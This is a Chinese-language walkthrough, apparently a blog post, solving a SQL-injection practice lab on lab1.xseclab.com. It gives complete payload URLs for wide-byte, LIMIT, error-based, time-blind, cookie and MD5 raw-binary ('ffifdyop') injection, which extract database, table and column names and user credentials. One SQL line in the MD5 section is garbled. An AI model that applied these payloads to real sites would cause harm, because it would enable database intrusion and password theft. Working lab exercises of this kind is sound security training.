防注入—宽字节注入
#爆数据库
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,database()%23
#爆表名
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x6D79646273%23
#爆列名
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7361655F757365725F73716C6934%23
#爆数据
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,group_concat(title_1),group_concat(content_1) from sae_user_sqli4 %23
到底能不能回显—limit注入
#数据库
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)%23&num=1
#表名
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,table_name,0x3f) from information_schema.tables where table_schema=0x6d79646273 limit 0,1))),1)#&num=1
#列名
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,column_name,0x3f) from information_schema.columns where table_name=0x75736572 limit 2,1))),1)%23&num=1
#数据
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,username,0x3a,password,0x3f) from user limit 2,1))),1)%23&num=1
ErrorBased—报错注入
#数据库
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,database(),0x7e))%23
#表
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x6D79646273),0x7e))%23
#列
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x6D6F74746F),0x7e))%23
#数据
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(rand(),concat(0x7e,(select concat(motto) from motto limit 3,1),0x7e))%23
盲注—延时盲注
#数据库
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascII(substr(database(),2,1))=121,1,sleep(5))%23
SQL注入通用防护—Cookie注入
Cookie: PHPSESSID=302e9cf079feae64eca5eb1af7937602;id=1 order by 3
#数据库
Cookie: PHPSESSID=302e9cf079feae64eca5eb1af7937602;id=1 union select 1,2,database()
据说哈希后的密码是不能产生注入的—MD5加密注入
s t r s q l = " s e l e c t ∗ f r o m ‘ u s e r ‘ w h e r e u s e r i d = " . i n t v a l ( strsql="select * from `user` where userid=".intval( strsql="select∗from‘user‘whereuserid=".intval(_GET[‘userid’])." and password=’".md5($_GET[‘pwd’], true) ."’";
userid转换为数字,pwd MD5加密
md5()函数第二个参数为true时,会返回16字符的二进制格式。当为false的时候,返回的就是32字符十六进制数。默认的是false模式。
md5('123') //202cb962ac59075b964b07152d234b70
md5('123',true) // ,�b�Y[�K-#Kp
需要一个字符串:(ffifdyop) MD5之后转成字符串有 ‘or’ 字样,变成
select * from user where userid=“1"and password =”'or’6"
456
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
